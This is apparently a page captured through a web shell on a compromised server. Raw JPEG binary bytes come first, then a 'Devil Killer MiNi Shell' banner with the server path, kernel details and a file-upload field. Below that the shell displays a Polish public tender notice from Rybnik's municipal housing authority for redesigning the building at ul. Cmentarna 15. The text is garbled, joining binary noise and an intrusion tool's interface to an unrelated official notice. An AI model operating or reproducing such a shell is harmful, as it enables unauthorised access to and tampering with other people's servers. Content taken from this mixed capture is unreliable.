JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250519/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250519/0023633801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie zamiennej dokumentacji projektowo-kosztorysowej dla pozwolenia na budowę nr 29/6740/2019 dla zamierzenia budowlanego przy ul. Cmentarnej 15 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKŁAD GOSPODARKI MIESZKANIOWEJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 271505550</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tadeusza Kościuszki 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rybnik</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@zgm.rybnik.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.zgm.rybnik.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie zamiennej dokumentacji projektowo-kosztorysowej dla pozwolenia na budowę nr 29/6740/2019 dla zamierzenia budowlanego przy ul. Cmentarnej 15 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ebe54bb6-4565-4a0b-b0f2-b9319eaa9c60</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00236338</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00005215/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.11 Wykonanie zamiennej dokumentacji projektowo-kosztorysowej dla pozwolenia na budowę nr 29/6740/2019 dla zamierzenia budowlanego przy ul. Cmentarnej 15</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-ebe54bb6-4565-4a0b-b0f2-b9319eaa9c60 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu Platformy e-zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu Platformy e-zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl/ <br/>2.	Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3.	Adres strony internetowej prowadzonego postępowania (link prowadzący bezpośrednio do widoku postępowania na Platformie e-Zamówienia): https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-ebe54bb6-4565-4a0b-b0f2-b9319eaa9c60 <br/>Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj postępowania/konkursy”).<br/>4.	Identyfikator (ID) postępowania na Platformie e-Zamówienia:<br/>ocds-148610-ebe54bb6-4565-4a0b-b0f2-b9319eaa9c60<br/>5.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>6.	Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>7.	Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>8.	Dokumenty elektroniczne , o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, <br/>z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>9.	Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>1)	w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub<br/>2)	jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>10.	Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913 oraz z 2021 r. poz. 1655) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna została zawarta w rozdziale I SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna została zawarta w rozdziale I SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZP.212.0012.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 492084,44 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 57965,60 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie zamiennej dokumentacji projektowo-kosztorysowej dla pozwolenia na budowę nr 29/6740/2019 z dnia 8 stycznia 2019 r. dla zamierzenia budowlanego: „Przebudowa budynku mieszkalnego wielorodzinnego wraz z przebudową wewnętrznej instalacji gazu na parceli nr 338/26 zlokalizowanej w Rybniku przy ul. Cmentarnej 15”. Dokumentacja jest niezbędna Zamawiającemu do ogłoszenia i przeprowadzenia postępowania o udzielenie zamówienia publicznego na podstawie ustawy Prawo Zamówień Publicznych.<br/>Dokumentacja projektowa opracowana w lipcu 2018 r. w pdf oraz pozwolenie na budowę - załączniki do SWZ. <br/>Charakterystyka obiektu:<br/>Działka numer 338/26 (powierzchnia 0,0410 ha). Budynek znajduje się w pośredniej strefie ochrony konserwatorskiej. Oznaczenie w Miejscowym Planie Zagospodarowania Przestrzennego jako 16.MN,U – teren zabudowy mieszkaniowej o niskiej intensywności, jednorodzinnej oraz usługowej bez uciążliwego oddziaływania.<br/>Ilość kondygnacji nadziemnych: 3, podziemnych: 1 (częściowe podpiwniczenie), jedna wewnętrzna klatka schodowa, 9 lokali mieszkalnych.<br/>Powierzchnia zabudowy – 183,0 m2 (budynek mieszkalny), 25,0 m2 (budynek gospodarczy).<br/>Powierzchnia użytkowa – 398,0 m2 (kondygnacje nadziemne), 61,0 m2 (piwnice).<br/>Kubatura budynku – 1 950,0 m3 .<br/>Budynek mieszkalny zrealizowany metodą tradycyjną o rzucie zbliżonym do litery „L”:<br/>-	ściany fundamentowe oraz ściany piwnic z cegły,<br/>-	posadzka piwnic z wylewki betonowej,<br/>-	strop nad piwnicą – strop odcinkowy na belkach stalowych, wypełnienie kolebek cegłą,<br/>- strop nad pomieszczeniem przedsionka to strop Kleina, pozostałe stropy międzykondygnacyjne drewniane,<br/>-	schody prowadzące na I oraz II piętro stalowe z drewnianymi stopnicami, schody do piwnicy murowane,<br/>-	podłogi wykończone płytkami terakotowymi, linoleum, panelami podłogowymi, płytami drewnianymi, deskami,<br/>-	ściany zewnętrzne i wewnętrzne w konstrukcji murowanej z cegły, otynkowane od wewnątrz,<br/>-	elewacja frontowa budynku nie jest pokryta tynkiem, widoczny wątek ceglany, z cegły uformowane zostały gzymsy – gzyms okapowy oraz gzymsy międzypiętrowe, otwory okienne oraz drzwiowe zwieńczone są nadprożami ceglanymi, pozostałe elewacje (boczna oraz od podwórza) wykończone tynkiem nakrapianym w jasnym kolorze,<br/>-	dach w konstrukcji tradycyjnej, drewnianej o pokryciu papowym na pełnym deskowaniu,<br/>-	stolarka okienna drewniana, typu skrzynkowego i z PVC,<br/>-	okienka piwniczne są doświetlane za pomocą studzienek piwnicznych, w większości zakryte,<br/>-	kominy murowane z cegły pełnej,<br/>-	do budynku doprowadzone są przyłącza wody, kanalizacji sanitarnej, gazu ziemnego i energii elektrycznej,<br/>-	mieszkania ogrzewane są piecami kaflowymi, w jednym lokalu na parterze piec kaflowy z instalacją centralnego ogrzewania (grzejniki),<br/>-	w budynku znajduje się instalacja wodno-kanalizacyjna, elektroenergetyczna i gazowa.<br/>Wymagany zakres opracowania:<br/>1. Projekt zagospodarowania terenu powinien obejmować:<br/>1) koncepcję:<br/>-	koncepcję Wykonawca sporządza w terminie nie dłuższym niż 28 dni licząc od dnia zawarcia umowy,<br/>-	termin na zatwierdzenie lub wniesienie uwag do koncepcji przez Zamawiającego wynosi do 7 dni od daty złożenia przez Wykonawcę.<br/>2) projekt zagospodarowania terenu.<br/>2. Projekt powinien uwzględniać między innymi:<br/>1) miejsce gromadzenia odpadów (zadaszona osłona),<br/>2) utwardzony dojazd i dojścia,<br/>3) opaskę chodnikową,<br/>4) podjazd dla osoby niepełnosprawnej od podwórza,<br/>5) przebudowę schodów zewnętrznych od frontu,<br/>6) rozbiórkę istniejącego budynku gospodarczego („chlewiki”),<br/>7) zagospodarowanie wód opadowych z dachu budynku,<br/>8) tereny zielone.<br/>Wykonawca opracuje projekt zagospodarowania terenu wyłącznie na podstawie koncepcji spełniającej oczekiwania Zamawiającego i zatwierdzonej przez Zamawiającego.<br/>Projekt architektoniczno-budowlany i projekt techniczny powinien obejmować:<br/>1. Koncepcję architektoniczno-budowlaną budynku mieszkalnego:<br/>-	koncepcję Wykonawca sporządza w terminie nie dłuższym niż 28 dni licząc od dnia zawarcia umowy,<br/>-	termin na zatwierdzenie lub wniesienie uwag do koncepcji przez Zamawiającego wynosi do 7 dni od daty złożenia przez Wykonawcę.<br/>2. Projekt architektoniczno-budowlany i projekt techniczny.<br/>Projekty powinny uwzględniać między innymi:<br/>1) termomodernizację budynku na podstawie aktualnych warunków technicznych:<br/>-	od wewnątrz budynku: elewacja frontowa (ściana od strony ulicy Cmentarnej), ściana zewnętrzna w linii granicznej działki, posadzka na gruncie, strop nad piwnicą,<br/>-	od zewnątrz budynku: ściany zewnętrzne od strony ogrodu (termoizolacja z wełny mineralnej),<br/>2) likwidację istniejących pieców kaflowych,<br/>3) naprawę pęknięć murów,<br/>4) izolację przeciwwilgociową ścian fundamentowych i ścian piwnicznych do głębokości 0,5 m poniżej poziomu terenu,<br/>5) likwidację istniejących schodów prowadzących na piętra i do piwnicy,<br/>6) remont elewacji frontowej – czyszczenie cegły, wymiana uszkodzonych cegieł, uzupełnienie ubytków ceglanych, wypełnienie pustych spoin,<br/>7) wykonanie nowego tynku na całym cokole,<br/>8) wymianę stolarki okiennej na okna z PVC i drzwi wejściowych z dostosowaniem do aktualnych wymagań technicznych,<br/>9) wymianę parapetów zewnętrznych na ceglane (elewacja frontowa) i blaszane (elewacje ogrodowe), parapety wewnętrzne z konglomeratu,<br/>10) remont, wzmocnienie, ewentualnie wymianę części uszkodzonych elementów więźby dachowej wraz z usunięciem przyczyny uszkodzenia,<br/>11) przebudowę istniejących kominów wystających ponad dachem i budowę nowych kominów, <br/>12) wymianę poszycia dachowego na styropapę wraz z podwyższeniem ogniomurków na wysokość wynikającą z zachowania wymogów ochrony pożarowej,<br/>13) likwidację rury spustowej prowadzonej we wnęce pośrodku elewacji frontowej i wykonanie dwóch nowych rur spustowych z PVC przy zewnętrznych krawędziach elewacji frontowej, uzupełnienie cegieł we wnęce,<br/>14) wymianę rynien na nowe z PVC z nadaniem nowych spadków,<br/>15)wykonanie nowych obróbek blacharskich,<br/>16) zapewnienie prawidłowej wentylacji wszystkich pomieszczeń piwnicznych,<br/>17) zaprojektowanie nowych naświetleń okienek piwnicznych,<br/>18) wykonanie zadaszeń nad wejściami do budynku,<br/>19) wykonanie schodów żelbetowych prowadzących z parteru na drugie piętro –klatka schodowa z komórkami lokatorskimi wyodrębniona z istniejących pomieszczeń o numerach: M1/1.3, M1/1.4, M5/2.1, K.3.2 wraz z wykonaniem instalacji elektrycznej niskoprądowej oraz malowanie,<br/>20) zapewnienie skrzynek na listy umieszczonych na klatce schodowej na parterze,<br/>21) wykonanie nowej klatki schodowej do piwnicy w miejscu istniejących pomieszczeń o numerach: M1/0.1, M1/1.2, M1/1.5,<br/>22) wykonanie nowych tynków i posadzek z pominięciem piwnic,<br/>23) wydzielenie pomieszczenia na wózki i rowery w miejscu istniejących pomieszczeń o numerach: M1/1.1, M1/1.2,<br/>24) dostosowanie wszystkich mieszkań do aktualnych warunków technicznych,<br/>25) jeden lokal mieszkalny dla osoby niepełnosprawnej na parterze,<br/>26) po dwa lokale mieszkalne na pierwszym i drugim piętrze,<br/>27) zapewnienie prawidłowej wentylacji grawitacyjnej w mieszkaniach,<br/>28) zapewnienie kanału wentylacyjnego do okapu kuchennego,<br/>29) wyposażenie mieszkań w autonomiczne czujki dymu i czadu,<br/>30) zapewnienie możliwości przygotowywania ciepłej wody użytkowej w każdym mieszkaniu (bojler elektryczny),<br/>31) instalację ciepłej wody użytkowej z podłączeniem armatury,<br/>32) instalację elektryczną uwzględniającą zabudowę urządzenia do przygotowywania ciepłych posiłków dla każdego mieszkania (kuchenka gazowa z piekarnikiem elektrycznym), każde mieszkanie wyposażyć w ciepłomierz,<br/>33) wydzielenie i przystosowanie istniejącego pomieszczenia piwnicznego o numerze M1/0.1 dla potrzeb kotłowni gazowej lub wymiennikowni ciepła,<br/>34) instalację centralnego ogrzewania zasilaną z kotłowni gazowej lub węzła cieplnego wraz z obliczeniami zapotrzebowania ciepła,<br/>35) instalację centralnego ogrzewania w technologii rur stalowych, łączonych systemem zaciskowym, na każdym grzejniku należy przewidzieć montaż zaworu termostatycznego oraz zaworu odcinającego (na powrocie), w łazienkach należy zamontować grzejniki drabinkowe,<br/>36) instalację odgromową,<br/>37) wyłaz dachowy z komunikacji wspólnej,<br/>38) sieć internetowo-telewizyjną w budynku – jedno gniazdo teleinformatyczne w każdym mieszkaniu,<br/>39) nowe okablowania od skrzynek rozdzielczych do tablic bezpiecznikowych w mieszkaniach,<br/>40) przebudowę kabla przyłączeniowego celem usunięcia z elewacji frontowej,<br/>41) przebudowę i przeniesienie na klatkę schodową skrzynek licznikowych i wykonanie nowej instalacji elektrycznej, zasilanie każdego mieszkania kablem 5x6 mm,<br/>42) nową instalację wodno-kanalizacyjną,<br/>43) nową instalację niskoprądową i domofonową,<br/>44) nową instalację gazu ziemnego,<br/>45) wykonanie podjazdu dla osoby niepełnosprawnej od podwórza,<br/>46) przebudowę schodów zewnętrznych od frontu wraz z utwardzeniem dojścia do chodnika publicznego,<br/>47) wycieraczkę systemową przed każdym wejściem do budynku,<br/>48) wymianę istniejącej skrzynki gazowej na nową (elewacja frontowa),<br/>49) wykonanie nowego oświetlenia zewnętrznego na elewacjach budynku,<br/>50) wykonanie nowej opaski chodnikowej z betonowych kostek brukowych,<br/>51) wykonanie nowego ogrodzenia od frontu (w tym brama i furtka),<br/>52) rozbiórkę istniejącego budynku gospodarczego („chlewiki”),<br/>53) udrożnienie kanalizacji deszczowej (ciąg główny) i wykonanie nowych przykanalików do rur spustowych.<br/>Wykonawca opracuje projekt architektoniczno-budowlany i projekt techniczny wyłącznie na podstawie koncepcji spełniającej oczekiwania Zamawiającego i zatwierdzonej przez Zamawiającego.<br/>Szczegółowy zakres usługi określa Specyfikacja Warunków Zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">180 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">został określony w SWZ w rozdziale XXII: &#34;Opis kryteriów oceny ofert, wraz z podaniem wag tych<br/>kryteriów i sposobu oceny ofert&#34;</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin przedstawienia sporządzonej koncepcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz oferty. Do przygotowania oferty zaleca się wykorzystanie Formularza oferty, którego wzór stanowi Załącznik nr<br/>1 do SWZ. W przypadku, gdy Wykonawca nie korzysta z przygotowanego przez Zamawiającego wzoru, w treści oferty<br/>należy zamieścić wszystkie informacje wymagane w Formularzu oferty.<br/>2. Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, o niepodleganiu wykluczeniu z postępowania o udzielenie<br/>zamówienia publicznego. Wzór oświadczenia o niepodleganiu 